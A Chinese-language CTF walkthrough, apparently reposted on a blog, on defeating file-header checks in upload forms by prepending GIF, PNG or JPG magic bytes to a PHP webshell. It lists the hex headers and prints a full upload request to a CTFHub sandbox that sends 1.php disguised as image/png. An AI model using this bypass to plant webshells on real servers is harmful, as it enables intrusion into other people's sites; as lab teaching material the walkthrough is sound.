当前位置: 首页 > article >正文

后端检测_文件头检测漏洞

把上面的文件头添加到我们的一句话木马内容最前面,达到绕过文件头检测的目的。

常见的文件头:

注意:下面的文件头的格式是16进制的格式:

GIF:47 49 46 38 39 61
png:89 50 4E 47 0D 0A 1A 0A
JPG:FF D8 FF E0 00 10 4A 46 49 46

给webshell添加文件头

下面我们使用md.php文件做实验,文件是一个phpinfo文件,我们把文件头添加到这个md.php中:

因为文件头是16进制的文件格式,我们需要使用C32Asm这个工具以16进制的格式打开这个文件。 点击下载C32Asm_16进制文件编辑器

下面我们给md.php文件添加文件头的效果:

png:

上传时要修改Content-Type类型为image/png,例如Content-Type: image/png

POST / HTTP/1.1
Host: challenge-f6c5fb62f13eda83.sandbox.ctfhub.com:10800
Content-Length: 303
Cache-Control: max-age=0
Origin: http://challenge-f6c5fb62f13eda83.sandbox.ctfhub.com:10800
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryebapg3FUVTaPAvLs
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://challenge-f6c5fb62f13eda83.sandbox.ctfhub.com:10800/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive

------WebKitFormBoundaryebapg3FUVTaPAvLs
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

PNG

<?php phpinfo();?>
------WebKitFormBoundaryebapg3FUVTaPAvLs
Content-Disposition: form-data; name="submit"

Submit
------WebKitFormBoundaryebapg3FUVTaPAvLs--

访问文件查看,成功解析


http://www.kler.cn/a/375125.html

相关文章:

  • StarRocks 生产部署一套集群,存储空间如何规划?
  • 捋一捋相关性运算,以及DTD和NLP中的应用
  • AOP 面向切面编程的实现原理
  • vscode添加全局宏定义
  • [Unity Shader][图形渲染] Shader数学基础11 - 复合变换详解
  • 多功能护照阅读器港澳通行证阅读机RS232串口主动输出协议,支持和单片机/Linux对接使用
  • 多处理机调度(李昂学长视频总结)25新增考点
  • 探索Python终端美化的终极利器:Rich库
  • SCRM系统的价格揭秘及投资回报分析
  • 边缘计算网关在机床数据采集中的应用-天拓四方
  • pandas——DataFrame
  • 多模态大模型的应用探索:多样场景下的创新实践
  • sql练习专场(一) 1-5
  • Linux·进程间通讯(管道)
  • python/Django创建应用(app)
  • 逗号运算符应用举例
  • SpringBoot国际化:创建多语言支持的Web应用
  • 【K倍区间】
  • 笔记-配置PyTorch(CUDA 12.2)
  • 常用linux 命令备份
  • 【网络安全 | 漏洞挖掘】逻辑漏洞+无限制爆破实现业务瘫痪
  • 【Linux网络】传输层协议UDP与TCP
  • Python画图3个小案例之“一起看流星雨”、“爱心跳动”、“烟花绚丽”
  • ubuntu上申请Let‘s Encrypt HTTPS 证书
  • 代理模式简单举例
  • Spring Boot框架下校园社团信息管理的优化策略